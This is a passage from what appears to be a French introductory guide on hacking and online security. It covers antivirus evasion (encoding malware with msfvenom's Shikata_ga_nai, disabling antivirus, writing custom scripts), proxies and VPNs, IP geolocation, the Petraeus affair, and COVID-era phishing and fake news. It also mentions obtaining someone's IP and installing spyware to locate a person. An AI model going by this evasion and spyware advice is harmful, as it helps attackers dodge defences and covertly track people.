ne les détectent pas.

Si en théorie ça reste comme même assez simple, en pratique ce n’est pas


toujours le cas.

Pour masquer la signature d’un malware plusieurs méthodes peuvent être


utilisées, la plus utilisée est de chiffrer le malware en utilisant des encodeurs.

Les encodeurs vont permettre d’altérer les codes du malware afin que ce virus
passe inaperçu face à l’antivirus. Par exemple l’encodeur Shikata_ga_nai qui est
utilisé à travers msfvenom sur Kali Linux.

 Mettre à l’arrêt ou bloquer un antivirus :

Cette technique consiste soit à mettre en arrêt un antivirus soit à


bloquer les mises à jour de l’antivirus sur l’ordinateur de la victime.
Remarque :

Toutes ces méthodes sont plus ou moins efficaces, mais le meilleur reste encore
de coder ses propres scripts.

En développant vos propres scripts, vous avez accès au code source donc vous
pouvez modifier son apparence comme vous voulez. Vous pouvez aussi modifier
les caractères qui sont détectés par les anti-virus.

Comme vous pouvez le savoir c’est une guerre de tout le jour.

D’une part vous avez les anti-virus qui patch à chaque fois qu’ils trouvent les
mises à jour pour contrer les malwares, contrer les systèmes utilisés par les
hackers pour chiffrer leurs malwares.

D’autre part vous avez les hackers qui se battent tout le jour pour trouver les
techniques, des nouvelles méthodes dont ne disposent pas pour le moment les
sociétés qui développent des anti-virus.

Être anonyme sur Internet :

Dans cette partie on parlera de comment naviguer sur internet sans laisser des
traces.

Avant de commencer, je préfère être direct avec vous, il est impossible d’être
anonyme sur internet à 100%.

Je dis cela parce que je vois des vidéos sur YouTube avec le titre “comment
devenir anonyme à 100%.’’

De mon côté par contre, je vais vous montrer comment laisser les minimums des
traces lorsque vous naviguez sur internet.

Pour cela, nous parlerons de l’utilisation des VPN et des Proxy.

1- Les Proxy :

Dans les séries policières on entend souvent que les hackers ont utilisés des
proxys pour effacer les traces.

Beaucoup de gens utilisent ce terme sans savoir ce que c’est réellement ?

Un proxy est une machine intermédiaire entre votre ordinateur et Internet. Il


peut par exemple être en Chine, aux USA ou au Canada enfin bref, très loin de là
où vous êtes et à utiliser pour des raisons de sécurités.

En effet les proxys permettent de filtrer les sites visités. Comme par exemples
les sites dangereux ou à caractères sexuels.
On peut utiliser des proxys afin de masquer ses traces lorsqu’on navigue sur
internet.

Les proxys gratuits il en existe beaucoup disponible sur internet. D’ailleurs si


vous vous rendez sur le site de Free Proxy List (https://free-proxy-list.net)
vous pouvez vous rendre compte que vous avez toute une liste.

Il existe aussi des sites qui vous permettent d’avoir un proxy gratuit, c’est le cas
de Kproxy.com. Il vous suffit juste de rentrer l’url du site sur lequel vous voulez
accéder et vous surfer en toute sécurité.

2- VPN (Virtual Private Network)

Souvent j’entends les gens dire qu’on utilise des VPN pour changer son adresse
IP. Cela est totalement faux.
Le changement d’adressage n’est pas l’objectif du VPN mais est une conséquence
de son utilisation.

Un VPN est un tunnel qui va se créer entre vous et le serveur VPN. C’est à
travers lui que vous pourrez accéder à internet.

Son objectif est de chiffrer votre communication afin qu’elle ne soit pas
intercepter ou modifier par un hacker.

Des VPN, il en existe beaucoup par exemple CyberGhost.

Remarque :

Tout cela nous emmène à nous poser la question suivante : faut-il utiliser des
VPN ou des Proxys ?
Moi je vous dirais les deux. On n’est jamais assez prudent.

Que ça soit en informatique ou dans la vie de tout le jour utiliser toujours une
double protection.

La géolocalisation par adresse IP :

1- Qu’est-ce qu’une adresse IP :

L’adresse IP ou Internet Protocol est une adresse codée en 32 bits qui vous
permettra de vous identifier sur un réseau.

 L’adresse IP Privée :

L’adresse IP Privée est celle qu’on utilise dans un réseau local. Vous pouvez
l’obtenir automatiquement par le routeur grâce au DHCP ou vous pouvez vous
définir une adresse manuellement.

 L’adresse IP Public :

C’est l’adresse qu’on utilise afin de sortir de votre routeur pour accéder à
internet.

Elle vous est automatiquement attribuée par votre Fournisseur d’Accès à


Internet (FAI).

Cette adresse changera selon le FAI que vous utilisez, par contre vous ne pouvez
pas le modifier.

Si vous voulez la cacher et la protéger vous pouvez utiliser un VPN ou un Proxy.

2- Comment obtenir l’adresse IP d’une personne ?

Il existe des techniques et méthodes qui vous permettront d’obtenir l’adresse IP


d’une personne. En traquant un lien que vous lui avait envoyé, en Sniffant la
communication.

3- Comment pouvez-vous localiser une adresse IP ?

Il est impossible de localiser l’emplacement exact d’une personne grâce à son


adresse IP.

L’adresse IP n’est pas l’adresse physique de l’ordinateur, il changera selon le FAI.


La seule personne susceptible de savoir vote localisation exacte est le FAI.
4- L’affaire Petraeus :

L’affaire Petraeus a éclaté en novembre 2012. Une personne recevait des emails
d’harcèlement de façon anonyme.

L’enquête remonte au sein du FBI, le FBI avait juste les emails qui ont été
envoyé. Le FBI n’a pas pu localiser la personne grâce à l’adresse IP, ils ont dû
donc faire appel au FAI. Celui-ci leurs a donné une liste d’endroit où les emails
ont été envoyé.

Le FBI s’est rendu sur les lieux grâce aux responsables de ces lieux, ils ont pu
obtenir la liste des personnes qui étaient présentes lors des envois de ces mails.
En comparant les listes venant de différents coins, ils ont pu se rendre compte
qu’un numéro de téléphone venait à chaque fois.

C’est ainsi que le général Petraeus (l’accusé) a finalement démissionné de ses


fonctions.

NB :

Ne croyez toujours pas toutes ces vidéos qui vous disent que vous pourrez
localiser une personne à travers de son adresse IP. Il y’a d’autre méthodes qui
vous permettent de localiser une personne notamment en lui installant un
Spyware (logiciel espion) à partir duquel vous pouvez le localiser.

Si le FBI n’a pas pu localiser une personne grâce à son adresse IP, ce n’est pas
vous qui pouvez.

La cybercriminalité en période du coronavirus :

La situation que nous vivons actuellement est assez dramatique.


Malheureusement certaines personnes ont perdues des proches, plusieurs
personnes se retrouvent au chômage, avec la crise économique entrainée par
cette pandémie plusieurs familles ont des difficultés de s’en sortir. Sauf que le
malheur des uns fait le bonheur des autres.

Pendant cette période de pandémie les hackers ont profités pour partager leurs
malwares ou pour mener des cyberattaques.

Selon les données publiées le 20 mars par les spécialistes du cyber sécurité
Check Point, 16000 nouveaux sites internet liés au coronavirus ont été
enregistrés depuis le début du mois de janvier et plus de 50% sont des sites
malveillants.
Pourquoi cette période est parfaite pour les cybercriminelles ?

Premièrement on a un sujet qui intéresse le monde entier, les utilisateurs du


monde entier passent leurs journées à chercher toutes informations liées au
coronavirus : des images, des vidéos, des évènements, des documents, etc…

Deuxièmement on a des émotions rattachées à un sujet, ce qui va empêcher pas


mal de personnes de réfléchir correctement.

Ensuite pas mal d’entreprises ont été obligées d’opter pour des solutions de
télétravail. Les deux solutions les plus utilisées sont : les VPN et le Cloud
Computing. Vue le peu de temps qu’ont eu des entreprises pour déployer ces
solutions, elles ont d’abord pensées à la continuité des activités et à la
disponibilité des informations avant de penser à la sécurité. Laissant
certainement des ouvertures que pourront exploiter les hackers.

Aussi, pas mal d’entreprises ont permis l’utilisation des ordinateurs personnels,
ce qui est aussi une grande ouverture pour les hackers.

Même si les VPN protègent la communication entre les utilisateurs et les


serveurs internes ou bien les utilisateurs et internet et que le Cloud Computing
offre aux utilisateurs un environnement sécurisé, c’est deux solutions ne
protègent pas l’ordinateur de l’utilisateur.

En d’autres termes si un hacker a installé un rat sur la machine de l’utilisateur, il


pourra accéder aux données de l’entreprise.

Pendant cette période l’attaque la plus utilisée est le phishing.

Qu’est-ce que le Phishing ?

Le phishing ou technique d’hameçonnage en Français est une technique employée


par les hackers afin de soutirer des informations personnelles. Pour cela ils vont
contacter leurs victimes par email ou par sms en se faisant passer pour une
personne ou un organisme en qui l’utilisateur à confiance.

Suite à la compagne de mobilisation pour la lutte contre le covid-19 des hackers


ont profités pour user passer l’identité de l’Organisation Mondiale de la Santé
(OMS) en faisant croire qu’ils partagent les techniques de préventions dans un
lien ou une pièce jointe attachée à un email mais évidemment celui-ci contient un
malware.

Un autre exemple d’attaque qui a été enregistré est l’attaque par trojan.
L’équipe MalwareHunterTeam qui propose une solution gratuite afin d’identifier
quel ransomware a été utilisé pour chiffrer vos données, partage souvent sur
leur compte Twitter les malwares découverts récemment qui utilisent le
coronavirus comme l’élément de façade. Exemple de programme : le
coronavirusmap qui est censé vous montrez le nombre de personne infectée par
pays mais en arrière-plan il récupère vos données de navigation et identifiants
enregistrés sur l’ordinateur.

Il y’a aussi une tendance qui contribue à rendre cette période désagréable et qui
a semée la terreur depuis le début de cette pandémie : les Fake news.

Les Fake news sont devenus une tendance depuis la création des réseaux sociaux.
Il n’a jamais été aussi facile de partager et de faire croire en une fausse
information.

Malheureusement mise à part les objectifs politiques, aujourd’hui vous avez des
personnes qui ne vivent que pour les fausses informations, ils passent leurs
journées à attendre des likes, des commentaires, et des partages qui leurs
permettront de mieux dormir la nuit et peu importe les moyens. Dès qu’ils voient
une information qui fait le buzz, ils vont la partager sans prendre la peine de
réfléchir aux conséquences que pourraient avoir leur action.

Les personnes qui partagent ces Fake news n’ont pas conscience à quel point un
simple partage peut avoir des répercussions terribles.
En mars dernier 27 personnes sont mortes en Iran après avoir bus de l’alcool,
elles avaient crues à la rumeur qui disait que l’alcool permet de lutter contre le
coronavirus.

Certains gouvernements commencent à prendre conscience de l’impact qu’ont ces


Fake news. Par exemple au Maroc le 19 mars une femme a été arrêtée ainsi que
ses complices car elle diffusait des vidéos sur youtube contenant des fausses
informations sur le traitement de lutte contre le covid-19. Suite à cela, il y’a eu
des dizaines d’arrestations enregistrées sur le territoire Marocain pour cause
des fausses informations.
Ce n’est pas parce qu’on est en période de pandémie que les autres crimes
s’arrêtent pour autant, vous devez rester sur vos gardes en permanence. Pour
éviter les fausses informations et contrer les cyberattaques vous devriez éviter
des réseaux sociaux car vous serez en permanence en stress et vous n’aurez pas
la bonne information. En restant sur les réseaux sociaux vous n’aurez que du
stress, de la colère et en plus vous devenez accro parce qu’il y a le côté addictif
aussi. Plus vous stressez plus votre système immunitaire va être en baisse et plus
de chance vous risquez de tomber malade, même une simple grippe va vous faire
flippé.

Chercher les informations sur les sites officiels, pas les sites qui contiennent
HTTPS soit disant le protocole qui vous permet de naviguer en toute sécurité
mais plutôt sur des sites d’organismes officiels qui sont censés vous divulguer
des informations. Pour le cas du covid-19, l’organisme le mieux placé est l’OMS.

La lutte contre le cyber criminalité ne change pas, c’est la même donc éviter de
cliquer sur des liens malveillants, utiliser des mots de passes complexes, équipez-
vous d’un antivirus, n’installer pas d’applications qui sont relatives aux covid-19.

Vous aimerez peut-être aussi